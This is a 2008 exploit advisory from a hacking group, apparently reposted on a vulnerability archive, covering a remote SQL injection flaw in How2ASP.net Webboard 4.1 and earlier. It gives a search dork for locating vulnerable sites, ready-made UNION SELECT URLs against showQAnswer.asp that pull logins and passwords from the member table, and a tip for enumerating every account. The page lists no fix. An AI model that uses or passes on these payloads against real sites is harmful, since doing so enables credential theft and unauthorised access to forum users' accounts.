How2ASP.net Webboard <= 4.1 Remote SQL Injection Vulnerability

2008-05-17 00:00:00

==========================================================
How2ASP.net Webboard 4.1
Remote SQL Injection Vulnerability
==========================================================

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

AUTHOR : CWH Underground
DATE : 17 May 2008
SITE : www.citecclub.org


#####################################################
APPLICATION : How2ASP.net Webboard
VERSION : <= 4.1 #
VENDOR : http://howtoasp.net
DOWNLOAD : http://howtoasp.net/dl/app/wb41/webboard41.zip
#####################################################


DORK: "Powered by How2asp"

---Exploit---

http://[target]/[path]/showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20from%20member%00

http://[target]/[path]/showQAnswer.asp?qNo=[SQL Statement]


---NOTE/TIP---

You must know what columns number that appear on pages, Insert username or password into columns number

You can enumerate all username and password use ->

http://[target]/[path]/showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20from%20member
%20where%20Login%20not%20in%20('admin','test',....)%00

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C #
##################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.